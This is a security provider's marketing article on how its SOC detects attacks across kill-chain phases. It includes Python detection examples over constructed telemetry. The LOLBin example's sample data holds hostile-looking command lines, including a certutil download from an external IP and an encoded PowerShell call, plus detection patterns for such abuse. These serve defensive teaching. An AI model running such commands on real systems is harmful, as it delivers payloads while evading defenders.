
Behind the Scenes at a SOC: How Is an Attack Detected and Thwarted in Real Time?

SOC Cybersecurity

Key Takeaways

  • The SOC evaluates security alerts. It correlates signals from endpoints, servers, security tools, and cloud environments to distinguish between false positives, legitimate activity, and threats that require intervention.
  • An attack is not limited to a single isolated event. A phishing email, an unusual login, the installation of a remote tool, or C2 communication may all be part of the same intrusion sequence. The SOC connects these steps to understand the progression of the attack.
  • SOC analysts combine detection rules, automation, and human analysis. Automation speeds up alert triage and the application of known scenarios. Human analysis remains necessary to interpret the customer’s context, assess the threat, and decide on the appropriate response.
  • The SOC can help contain an ongoing attack. Depending on the scenario and the procedures defined with the customer, analysts can recommend or initiate the isolation of a device, the blocking of a compromised account, the revocation of credentials, or the termination of suspicious communication.

Rsecure offers two levels of SOC monitoring depending on the scope of the environment to be protected. R-SOC Tranquility is designed for small and medium-sized businesses that want to secure their workstations and Microsoft 365 with EDR and standardized detection rules. R-SOC is intended for organizations that need to monitor a broader scope, including servers, networks, the cloud, and business applications.

For the fourth consecutive year, cyber risk has emerged as the top threat to European business leaders, according to the risk barometer published by the insurer Allianz in 2025. The fear of disruption caused by a cyberattack is once again the primary concern for organizations, ahead of natural disasters and climate change.

The challenge for companies isn’t just investing in cybersecurity solutions. They must also be able to process alerts, understand suspicious indicators, and take action before a cybercriminal gains access to internal data and compromises the information system.

This is precisely the role of the SOC (Security Operations Center), a team of cybersecurity experts that continuously monitors security events and analyzes alerts from your IT infrastructure.

Long associated with large organizations, SOCs are becoming more widely available to small and medium-sized businesses (SMEs) through managed services tailored to their budgets, environments, and operational constraints.

Why is a SOC essential to your cybersecurity? How does it work? What can it offer an SME that already has antivirus software or a firewall?

The experts at Rsecure, our cybersecurity subsidiary, answer these questions in this article.

What is a SOC, and how does it strengthen your company’s cybersecurity posture?

Your company likely already has antivirus, firewall, or antispam software directly integrated into your collaborative work environment, such as Microsoft 365 or Google Workspace. If there’s any doubt about suspicious behavior, these IT security solutions generate alerts. But without a holistic view, it becomes difficult to determine whether these signals indicate an intrusion or are simply false positives.

As an extension of your IT team, the SOC provides this analytical capability. It correlates and aggregates telemetry data from all your IT equipment, analyzes these events, and then places them within the context of your business. As Laurent TABARD, SOC Manager at Rsecure, points out: “The SOC is more than just a monitoring console. It relies on an organizational structure, detection rules, and human analysis that enable us to detect complex modus operandi.”

In addition to the SOC’s detection capabilities, remediation efforts are also carried out. When a threat is confirmed, SOC analysts work to contain its spread within the client’s information system. In particular, they can block escape attempts, halt lateral movement to other workstations or servers, isolate a compromised workstation, or revoke credentials used during the attack.

How is a SOC team organized?

Rsecure’s SOC is structured around three levels of expertise:

  • The Level 1 analyst performs an initial assessment of the collected telemetry data. Their primary responsibility is to determine whether an alert is a false positive, expected activity, or a signal that requires further investigation.
  • In case of suspicion, the Level 2 analyst, or N2, conducts a more in-depth analysis. They correlate the information, review the client’s context, and verify whether multiple signals point to a confirmed threat.
  • The Level 3 analyst, or N3, handles complex cases, remediates, and mitigates the threat. They conduct advanced investigations and contribute to the continuous improvement of the service, particularly by integrating new detection rules or third-party solutions, whether open-source or proprietary.

This organizational structure optimizes alert handling and allows analysts to focus their expertise on events that warrant it.


How does the SOC detect cyberattacks against your company?

A cyberattack rarely consists of a single action. It follows a series of steps, ranging from a reconnaissance phase to intrusion into the target’s information system. Known as the “Kill Chain,” this model enables SOC analysts to anticipate a cybercriminal’s next moves once a threat has been confirmed.

At first glance, a phishing email received by an employee may seem like just an isolated incident. However, if it is followed by an unusual connection from an unknown device, then an attempt to install a remote administration tool, the scenario changes. By drawing on reference frameworks and typical attack models, of which the Kill Chain is an example, the SOC analyst connects these events to determine whether they are part of the same attack sequence.
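The sequence just described (a phishing email, then a login from an unknown device, then the installation of a remote administration tool) can be expressed as a small correlation rule. The following is an added example, not Rsecure’s code or detection content; the event fields, the list of known devices and the name of the unsanctioned remote tool are constructed assumptions. It groups stage events per user, keeps only those that extend the chain in kill-chain order within a time window, and grades the result the way a Level 1 analyst would decide whether to monitor, investigate or escalate.

```python
"""Added example (not Rsecure's code): correlating events from three sources
into one intrusion sequence per user, the way the text describes a phishing
email, an unusual login and a remote-tool install being tied together."""
from datetime import datetime, timedelta

# Constructed sample telemetry. Field names and values are assumptions, not a
# real product schema; timestamps are ISO 8601.
EVENTS = [
    {"ts": "2025-03-10T08:02:00", "source": "mail", "user": "alice",
     "type": "phishing_reported"},
    {"ts": "2025-03-10T08:15:00", "source": "identity", "user": "alice",
     "type": "login", "device": "unknown-device-42"},
    {"ts": "2025-03-10T08:31:00", "source": "edr", "user": "alice",
     "type": "process_start", "image": "remote_admin_setup.exe"},
    {"ts": "2025-03-10T09:00:00", "source": "identity", "user": "bob",
     "type": "login", "device": "bob-laptop"},
    {"ts": "2025-03-10T09:05:00", "source": "edr", "user": "bob",
     "type": "process_start", "image": "excel.exe"},
    {"ts": "2025-03-11T14:00:00", "source": "mail", "user": "carol",
     "type": "phishing_reported"},
]

# Client context the analyst would consult (assumed): devices each user normally
# logs in from, and remote-administration tools not sanctioned in this environment.
KNOWN_DEVICES = {"alice": {"alice-laptop"}, "bob": {"bob-laptop"}, "carol": {"carol-laptop"}}
UNSANCTIONED_REMOTE_TOOLS = {"remote_admin_setup.exe"}

# Kill-chain stages this example recognises, in the order they must occur.
STAGE_ORDER = ["delivery", "exploitation", "installation"]
# 0 = stage events seen but not in chain order (e.g. an odd login with no phishing before it).
VERDICTS = {0: "review", 1: "monitor", 2: "investigate", 3: "escalate"}


def stage_of(event):
    """Map one raw event to a kill-chain stage, or None if it is routine."""
    if event["type"] == "phishing_reported":
        return "delivery"
    if event["type"] == "login":
        if event.get("device") not in KNOWN_DEVICES.get(event["user"], set()):
            return "exploitation"          # login from a device never seen for this user
    if event["type"] == "process_start":
        if event.get("image", "").lower() in UNSANCTIONED_REMOTE_TOOLS:
            return "installation"
    return None


def correlate(events, window=timedelta(hours=4)):
    """Per user, walk stage events in time order and keep those that extend the
    chain in kill-chain order within `window` of the first stage. Returns
    {user: {"stages": [...], "verdict": ...}} for users with at least one stage event."""
    by_user = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(e)
        if stage is not None:
            by_user.setdefault(e["user"], []).append((datetime.fromisoformat(e["ts"]), stage))

    findings = {}
    for user, staged in by_user.items():
        chain = []
        for ts, stage in staged:
            if len(chain) == len(STAGE_ORDER):
                break
            # Out-of-order stages are ignored; the chain only grows forward.
            if stage == STAGE_ORDER[len(chain)] and (not chain or ts - chain[0][0] <= window):
                chain.append((ts, stage))
        stages = [s for _, s in chain]
        findings[user] = {"stages": stages, "verdict": VERDICTS[len(stages)]}
    return findings


if __name__ == "__main__":
    for user, f in correlate(EVENTS).items():
        print(f"{user}: {' -> '.join(f['stages']) or '(no chain)'} => {f['verdict']}")
```

Bob’s login from his own laptop and his spreadsheet never become stage events, so he is not reported at all; Carol’s phishing report alone is only monitored; Alice’s three stages inside the window produce an escalation. Widening or narrowing `window` is the knob that decides whether a remote-tool install ten hours after the phishing email still counts as the same sequence.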

At Rsecure, our SOC analysts have the expertise needed to connect these signals. They can intervene at various stages of a cyberattack to limit its progression, whether it aims to steal data, encrypt files, compromise accounts, or disrupt business operations.

Phase 1 – Reconnaissance: The First Signs Before the Attack

An attack often begins with a reconnaissance phase known as “recon.” The cyberattacker seeks to understand the environment of the targeted company. They may scan exposed applications, identify services accessible from the Internet, or collect publicly available information about the organization and its employees.

What the SOC can do: When deploying the SOC for our clients, Rsecure’s experts provide configuration recommendations, particularly regarding services accessible from the Internet. This advice is designed to reduce the company’s exposed attack surface.

This initial work then makes it easier for analysts to detect weak signals. Repeated scans of these exposed services, or indicators derived from CTI (Cyber Threat Intelligence), will be more effectively identified and assessed and, where appropriate, will be subject to enhanced monitoring.

Phase 2 – Delivery: The Attack Hits the Target

The delivery phase is when the attacker’s lure or payload reaches the company. In a common scenario, an employee receives a phishing message. It may contain a link, an attachment, or a redirect to a fraudulent page.

What the SOC can do: Teams analyze suspicious links, the domain associated with the sender, and the message’s content. Phishing is not treated as an isolated event, but as the starting point of a potential sequence of actions to monitor.

Phase 3 – Exploitation: The Cyberattacker Attempts to Gain Initial Access

The exploitation phase begins when the cyberattacker attempts to capitalize on the target’s action. The employee may click on a link, enter their credentials, open a file, or download something. The attacker may also make multiple login attempts, test common passwords, or use credentials obtained from data breaches.

What the SOC can do: The team analyzes the actions that follow this initial contact to understand the impact on the client’s IT environment. As our SOC Manager at Rsecure explains: “It’s based on the actions taken afterward that you’ll detect that there may be a problem.”

The value of the SOC therefore lies in its ability to interpret a chain of events as a whole, rather than as isolated actions.

Phase 4 – Installation: The Cyberattacker Establishes Persistent Access

After the exploitation phase, the attacker may seek to establish persistent access to the compromised machine. This may involve malware (a payload) or the use of a legitimate program already present on the victim’s machine.

This technique is known as “Living off the Land.” As Rsecure’s SOC Manager explains: “These are legitimate tools that are hijacked for malicious purposes.”

“LOLBins” (Living Off the Land Binaries), in particular, are legitimate system executables (PowerShell, WMIC, certutil.exe) that are frequently hijacked by attackers.

What the SOC can do: verify whether the program being used is legitimate within the client’s environment, whether the actions being performed align with its typical usage, and whether network communications reveal any suspicious external traffic.
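The three checks above (is the program legitimate here, does its use match its normal usage, does it talk to the outside) can be scored mechanically against process-creation telemetry before an analyst looks at the result. The following is an added example, not Rsecure’s code: the EDR-style records, the per-client baseline of expected users and parent processes, and the internal address ranges are constructed assumptions, and the argument patterns are the kind found in public detection rule sets rather than anything specific to this service.

```python
"""Added example (not Rsecure's code): scoring constructed process-creation
records against the three checks in the text: is the binary expected in this
environment, do its arguments match normal usage, and did it reach outside."""
import ipaddress
import re

# Constructed EDR-style process events; field names are assumptions.
PROCESS_EVENTS = [
    {"host": "ws-12", "user": "alice", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand <base64-blob>", "remote_ip": "203.0.113.7"},
    {"host": "srv-01", "user": "svc-backup", "image": "powershell.exe", "parent": "taskeng.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1", "remote_ip": "10.0.0.5"},
    {"host": "ws-07", "user": "bob", "image": "certutil.exe", "parent": "winword.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/update.bin", "remote_ip": "203.0.113.9"},
    {"host": "ws-07", "user": "bob", "image": "certutil.exe", "parent": "cmd.exe",
     "cmdline": "certutil.exe -hashfile setup.msi SHA256", "remote_ip": None},
    {"host": "ws-03", "user": "carol", "image": "wmic.exe", "parent": "cmd.exe",
     "cmdline": "wmic process call create notepad.exe", "remote_ip": None},
]

# Per-client baseline (assumed): who normally runs each LOLBin and from what parent.
EXPECTED_USAGE = {
    "powershell.exe": {"parents": {"explorer.exe", "taskeng.exe", "svchost.exe"},
                       "users": {"svc-backup", "it-admin"}},
    "certutil.exe": {"parents": {"cmd.exe"}, "users": {"it-admin"}},
    "wmic.exe": {"parents": {"cmd.exe"}, "users": {"it-admin"}},
}
# Argument patterns outside each binary's routine use (the kind documented in
# public rule sets such as Sigma; not exhaustive, matched case-insensitively).
ABNORMAL_ARGS = {
    "powershell.exe": [r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"downloadstring"],
    "certutil.exe": [r"-urlcache", r"-decode\b"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
}
# The client's internal address ranges (assumed); anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SEVERITY = {1: "low", 2: "medium", 3: "high", 4: "high"}


def is_external(ip):
    """True when the process reached an address outside the client's declared ranges."""
    return ip is not None and not any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)


def assess(event):
    """Return the list of reasons this event deviates from the baseline (empty if none)."""
    image = event["image"].lower()
    baseline = EXPECTED_USAGE.get(image)
    if baseline is None:
        return []                                   # not a LOLBin this example tracks
    reasons = []
    if event["parent"].lower() not in baseline["parents"]:
        reasons.append("unexpected_parent")
    if event["user"] not in baseline["users"]:
        reasons.append("unexpected_user")
    cmd = event["cmdline"].lower()
    if any(re.search(p, cmd) for p in ABNORMAL_ARGS[image]):
        reasons.append("abnormal_arguments")
    if is_external(event["remote_ip"]):
        reasons.append("external_connection")
    return reasons


def triage(events):
    """Return (host, image, severity, reasons) for every event with at least one reason."""
    out = []
    for e in events:
        reasons = assess(e)
        if reasons:
            out.append((e["host"], e["image"], SEVERITY[len(reasons)], reasons))
    return out


if __name__ == "__main__":
    for host, image, sev, reasons in triage(PROCESS_EVENTS):
        print(f"{sev:6} {host} {image}: {', '.join(reasons)}")
```

The scheduled backup script on srv-01 produces no finding even though it is PowerShell, because every check agrees with the baseline; the same binary on a workstation, run by a user who never uses it, with encoded arguments and an external connection, scores high. That is the point of the text: the verdict comes from the client’s context, not from the name of the executable.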

Phase 5 – Remote Control: The Cyberattacker Takes Control

Once persistent access has been established, the cybercriminal seeks to communicate with the compromised workstation or server through a command-and-control (C2) channel. This channel allows the cybercriminal to send instructions to the compromised device, perform actions remotely, and prepare the next steps in the attack—often lateral movement within the information system.

What the SOC can do: Teams continuously analyze data transiting through the company’s network. Analysts look for any unusual communication, suspicious domain names, or abnormal data traffic volumes. Detection rules predefined by SOC teams partially automate this work and trigger security alerts.
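The three things analysts look for in network data (unusual communication, suspicious destinations, abnormal volumes) map onto simple statistics over flow records, which is how the predefined rules the text mentions partially automate the work. The following is an added example, not Rsecure’s code or one of its rules: the flow records, the allowlist of known destinations and the thresholds are constructed assumptions. It flags machine-regular timing to one destination (the classic beacon pattern), destinations not known for this client, and outbound volume above a baseline.

```python
"""Added example (not Rsecure's code): screening constructed outbound flow
records for the three C2 signs the text lists: unusual (regularly timed)
communication, destinations not known for this client, and abnormal volume."""
from collections import defaultdict
from statistics import mean, pstdev

# Destinations the client is known to use (assumed allowlist).
KNOWN_DESTINATIONS = {"intranet.example.com", "updates.example.com"}
MIN_FLOWS_FOR_BEACON = 6       # need enough samples before judging regularity
MAX_CV_FOR_BEACON = 0.15       # stdev/mean of inter-flow gaps below this = machine-like timing
VOLUME_THRESHOLD = 50_000_000  # bytes per host/destination pair (assumed baseline)


def make_flows():
    """Constructed flow records as (seconds, host, destination, bytes_out)."""
    flows = []
    t = 0
    for jitter in (0, 1, -1, 0, 1, 0, -1, 1, 0, 0):   # ws-12: a 60 s beacon with +/-1 s jitter
        t += 60 + jitter
        flows.append((t, "ws-12", "a1b2c3d4.example.net", 512))
    t = 0
    for gap in (5, 140, 22, 900, 60, 3, 410):          # ws-07: human-paced browsing
        t += gap
        flows.append((t, "ws-07", "intranet.example.com", 20_000))
    flows.append((3600, "srv-01", "files.example.net", 200_000_000))  # srv-01: one large upload
    return flows


def interval_cv(timestamps):
    """Coefficient of variation of gaps between consecutive flows (lower = more regular)."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    return pstdev(gaps) / m if m else float("inf")


def analyze_flows(flows):
    """Return {(host, dst): [reasons]} for pairs showing at least one C2 sign."""
    by_pair = defaultdict(list)
    for ts, host, dst, nbytes in flows:
        by_pair[(host, dst)].append((ts, nbytes))
    findings = {}
    for (host, dst), recs in by_pair.items():
        reasons = []
        if len(recs) >= MIN_FLOWS_FOR_BEACON and interval_cv([t for t, _ in recs]) < MAX_CV_FOR_BEACON:
            reasons.append("regular_interval")
        if dst not in KNOWN_DESTINATIONS:
            reasons.append("unknown_destination")
        if sum(b for _, b in recs) > VOLUME_THRESHOLD:
            reasons.append("large_outbound_volume")
        if reasons:
            findings[(host, dst)] = reasons
    return findings


if __name__ == "__main__":
    for (host, dst), reasons in analyze_flows(make_flows()).items():
        print(f"{host} -> {dst}: {', '.join(reasons)}")
```

The beacon from ws-12 is tiny in volume but perfectly regular and aimed at a domain nobody in the client uses; the server upload is a single flow, so timing says nothing, but its destination and size do. Each finding is still a candidate: the text is explicit that a rule only raises the alert, and an analyst confirms the malicious nature before any remediation such as an EDR process kill is initiated.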

If the malicious nature of the activity is confirmed, a remediation measure can be initiated, such as stopping the suspicious process using an EDR solution installed beforehand on workstations and other devices in the IT infrastructure.

Phase 6 – The Ultimate Goal: Data Exfiltration

After gaining persistent access, the attacker most often seeks to exfiltrate data and move laterally across the company’s internal network in order to infect new machines.

What the SOC can do: By this stage, SOC analysts have collected several indicators, which they can correlate to determine whether an attack is indeed underway, assess the potential impact, and identify the affected devices and user accounts.

Once the threat has been assessed, the client is alerted, and remediation actions are initiated with the client’s consent. These actions may include blocking the account or isolating compromised devices.

The SOC then fully fulfills its role as an advisor and support provider. The analysts’ expertise and their knowledge of the client’s environment enable them to act quickly and propose appropriate measures.

Thus, while automated detection and artificial intelligence can facilitate the detection of cyberattacks, the SOC’s actions remain guided by human analysis. “The final decision is always made by a human,” explains Laurent Tabard.


Managed SOC: An Accessible Service for SMEs

A SOC offers several advantages for companies looking to strengthen their cybersecurity without having to build a dedicated in-house team.

Our R-SOC Tranquility offering was designed with this in mind. Tailored for small and medium-sized businesses, it is based on a transparent pricing model determined by the scope to be monitored and the components to be secured within your infrastructure. “At Rsecure, the model is based on a user, a machine, or a server. This makes it easier to forecast your budget,” explains Laurent Tabard, SOC Manager at Rsecure.

Our SOC analysts can provide continuous monitoring from our offices in Luxembourg, 24 hours a day, 7 days a week.

With the R-SOC offering, companies with broader monitoring needs—or those subject to stricter regulatory requirements—can expand their coverage, customize the scope of monitoring, and tailor the monitoring to more specific work environments or infrastructures.

Detect cyber threats with Rsecure’s SOC

To ensure that IT security doesn’t become an additional burden for your business, Rsecure steps in to support your teams and strengthen your cybersecurity posture.

Our experts are on standby to assist you in the event of a suspected or confirmed attack, as well as during incident response, by supporting your teams.

Contact the Rsecure team today to assess the level of monitoring best suited to your business.
